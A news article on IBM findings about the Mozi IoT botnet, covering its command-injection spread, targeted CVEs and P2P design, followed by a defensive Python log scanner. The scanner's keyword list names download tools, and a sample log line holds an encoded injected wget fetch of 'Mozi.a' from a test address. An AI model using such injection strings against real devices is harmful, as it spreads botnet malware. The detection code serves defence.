According to IBM, Mozi, a relatively new botnet, is responsible for the increase in Internet of Things (IoT) botnet activity.
The Mozi botnet has been used heavily over the past year and accounted for 90% of the IoT network traffic observed between October 2019 and June 2020. However, the researchers found that it carried out attacks without trying to remove its competitors from breached systems.
On the other hand, the large increase in attacks on IoT devices is not solely due to the effectiveness of the botnet. It is largely due to the increased use of IoT devices worldwide. More devices mean more opportunities for attacks. According to IBM, there are about 31 billion IoT devices worldwide.
Researchers believe that the success of the Mozi botnet is based on the use of command injection (CMDi) attacks, which exploit incorrect configurations on IoT devices. The combination of increased use of IoT devices and misconfigured protocols is responsible for the increase in attacks. Of course, the prolonged remote work due to COVID-19 also plays an important role.
The researchers observed that almost all attacks targeting IoT devices use the CMDi technique for initial access. The Mozi botnet performs CMDi using a "wget" shell command and then changes permissions to facilitate the intruders' interaction with the target system.
IBM said that on vulnerable devices, a file named "Mozi.a" was downloaded and then executed on the MIPS architecture. The attack targets machines that use a RISC computer architecture (MIPS is a RISC instruction set architecture) and can enable a hacker to modify the firmware in order to install additional malware.
The Mozi botnet targets many vulnerabilities to infect IoT devices: CVE-2017-17215 (Huawei HG532), CVE-2018-10561 / CVE-2018-10562 (GPON routers), CVE-2014-8361 (Realtek SDK), CVE-2008-4873 (Sepal SPBOARD), CVE-2016-6277 (Netgear R7000 / R6400), CVE-2015-2051 (D-Link devices), Eir D1000 wireless router command injection, Netgear setup.cgi RCE, MVPower DVR command execution, D-Link UPnP SOAP command execution, and an RCE that affects many CCTV-DVR vendors.
The hackers behind the Mozi botnet use infrastructure located mainly in China (84%).
"Mozi botnet is a peer-to-peer (P2P) botnet based on the distributed sloppy hash table (DSHT) protocol, which can be spread through exploits of IoT devices and weak telnet passwords," says IBM.
According to IBM, the botnet can be used to carry out distributed denial-of-service (DDoS) attacks, execute malicious commands, run additional payloads and collect information.
According to SecurityWeek, researchers stress that organizations that use IoT devices need to address this increasingly common threat. Command injection remains the main form of infection, so it is important to change the default settings of the device and make continuous checks to find possible security gaps.
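One concrete form of the "continuous checks" recommended above, aimed at the wget-based command injection the report describes as Mozi's initial-access step: an added example, not code from IBM, SecurityWeek or the original article, that scans constructed web-server access log lines for CMDi indicators and flags a request only when several of them coincide. The log format, the endpoint paths and the keyword list are assumptions, and the sample lines use TEST-NET addresses.

```python
import re
from typing import List, Tuple
from urllib.parse import unquote_plus

# Apache/nginx combined-style access log line (assumed format for this example).
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+)[^"]*" (?P<status>\d{3})')
# Shell metacharacters that chain an injected command onto a legitimate parameter.
SHELL_SEPARATORS = re.compile(r"[;|`]|&&|\$\(")
# Download-and-run keywords; the article names wget as Mozi's CMDi vehicle.
DOWNLOAD_EXEC = re.compile(r"\b(wget|curl|tftp|chmod|busybox)\b", re.IGNORECASE)
# Device endpoints of the kind the article lists (Netgear setup.cgi, UPnP SOAP); paths are assumed.
SUSPECT_PATHS = ("/setup.cgi", "/soap.cgi", "/GponForm/")

def score_request(url: str) -> List[str]:
    """Return the CMDi indicators found in one request URL."""
    decoded = unquote_plus(url)  # %3B and '+' encodings hide the separators
    reasons = []
    if SHELL_SEPARATORS.search(decoded):
        reasons.append("shell separator")
    if DOWNLOAD_EXEC.search(decoded):
        reasons.append("download/exec keyword")
    if decoded.startswith(SUSPECT_PATHS):
        reasons.append("known IoT CMDi endpoint")
    return reasons

def find_cmdi(lines: List[str], min_indicators: int = 2) -> List[Tuple[str, str, List[str]]]:
    """Flag requests carrying at least min_indicators indicators; a lone keyword is too noisy."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # malformed line: skip rather than crash the sweep
        reasons = score_request(m["url"])
        if len(reasons) >= min_indicators:
            hits.append((m["ip"], m["url"], reasons))
    return hits

# Constructed sample log lines (TEST-NET addresses, not real infrastructure).
SAMPLE_LOG = [
    '198.51.100.7 - - [10/Sep/2020:10:01:02 +0000] "GET /setup.cgi?cmd=%3Bwget+http://203.0.113.10/Mozi.a HTTP/1.1" 200 12',
    '198.51.100.8 - - [10/Sep/2020:10:01:05 +0000] "GET /index.html HTTP/1.1" 200 5120',
    '198.51.100.9 - - [10/Sep/2020:10:01:09 +0000] "GET /search?q=wget+manual HTTP/1.1" 200 880',
    'garbage line that does not parse',
]

if __name__ == "__main__":
    for ip, url, reasons in find_cmdi(SAMPLE_LOG):
        print(f"{ip} {url} -> {', '.join(reasons)}")
```

The threshold of two indicators keeps an ordinary search query that merely mentions "wget" from raising an alert, while a URL-encoded separator followed by a download command against a device endpoint is caught.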